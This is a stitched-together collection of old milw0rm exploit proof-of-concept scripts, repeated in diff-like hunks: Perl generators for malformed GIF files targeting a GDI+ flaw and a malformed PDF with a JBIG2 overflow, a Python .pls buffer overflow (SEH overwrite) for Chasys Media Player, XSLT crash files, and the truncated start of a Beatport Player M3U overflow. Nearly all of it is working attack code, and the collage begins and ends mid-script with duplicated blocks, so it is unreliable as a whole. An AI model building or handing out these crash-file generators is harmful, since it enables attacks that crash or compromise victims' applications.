"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#4
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
"\x00". # Terminator
"\x3B". # Trailer
open(out, "> crash.gif");
binmode(out);
print (out $gif);
close(out);
# milw0rm.com [2008-10-09]
------------------------------------------------------------------------------------------------------------
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
============================================================================================================
#!/usr/bin/perl
#
use strict;
my $gif =
"\x47\x49\x46\x38\x39\x61". # GIF header
"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor
# COLOR Stream
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (1) Size: 21+1
#0
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#1
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC".
"\x21\xEC".
#2
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#3
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#4
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#5
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#6
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#7
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#8
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#9
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#10
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#11
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E".
"\x01\x5A".
"\x00". ## Terminator
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (2) Size: EC+1
#0
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#1
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#2
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#3
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#4
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
"\x00". # Terminator
"\x3B". # Trailer
open(out, "> crash.gif");
binmode(out);
print (out $gif);
close(out);
# milw0rm.com [2008-10-09]


@ -1,90 +1,90 @@
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf()
{
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
" \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
" \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .
"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .
"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";
}
# milw0rm.com [2009-02-23]
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf()
{
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
" \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
" \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .
"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .
"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";
}
# milw0rm.com [2009-02-23]


@ -1,20 +1,20 @@
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
# I have tried a lot of Addresses .
# Waitting for the Exploit from someone .
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print " Discovered By : zAx"
print " Contact : ThE-zAx@Hotmail.Com"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
# I have tried a lot of Addresses .
# Waitting for the Exploit from someone .
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print " Discovered By : zAx"
print " Contact : ThE-zAx@Hotmail.Com"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]


@ -1,43 +1,43 @@
-------------
by DATA_SNIPER
GREETZ TO THE FOUNDER ;)
fore more information and bug analyses:
http://www.at4re.com/f/showthread.php?p=47560
i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000]
so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart can exploit it by changing some things in the exploit.
and the second code change the EAX to 017ED9A0.
xslt.xsl code EAX=00000031:
<?xml version="1.0" encoding="UTF-8"?>
http://www.w3.org/1999/XSL/Transform">
<xsl:key name="label" match="item1" use=""/>
<xsl:template match="root">
<xsl:for-each select="key('label', @item1)">
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
xslt.xsl code EAX=017ED9A0:
<?xml version="1.0" encoding="UTF-8"?>
http://www.w3.org/1999/XSL/Transform">
<xsl:key name="label" match="item1" use=""/>
<xsl:template match="root">
<xsl:value-of select="key('label', @item1)">
</xsl:value-of>
</xsl:template>
</xsl:stylesheet>
xmlcrash.xml code:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>
http://www.w3.org/2001/XMLSchema-instance">
<item1 id="datasniper" />
</root>
# milw0rm.com [2009-04-06]
-------------
by DATA_SNIPER
GREETZ TO THE FOUNDER ;)
fore more information and bug analyses:
http://www.at4re.com/f/showthread.php?p=47560
i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000]
so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart can exploit it by changing some things in the exploit.
and the second code change the EAX to 017ED9A0.
xslt.xsl code EAX=00000031:
<?xml version="1.0" encoding="UTF-8"?>
http://www.w3.org/1999/XSL/Transform">
<xsl:key name="label" match="item1" use=""/>
<xsl:template match="root">
<xsl:for-each select="key('label', @item1)">
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
xslt.xsl code EAX=017ED9A0:
<?xml version="1.0" encoding="UTF-8"?>
http://www.w3.org/1999/XSL/Transform">
<xsl:key name="label" match="item1" use=""/>
<xsl:template match="root">
<xsl:value-of select="key('label', @item1)">
</xsl:value-of>
</xsl:template>
</xsl:stylesheet>
xmlcrash.xml code:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>
http://www.w3.org/2001/XMLSchema-instance">
<item1 id="datasniper" />
</root>
# milw0rm.com [2009-04-06]


@ -1,23 +1,23 @@
#####################################################################################################
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
# Discovered by SirGod - www.mortal-team.net
# Error log :
#
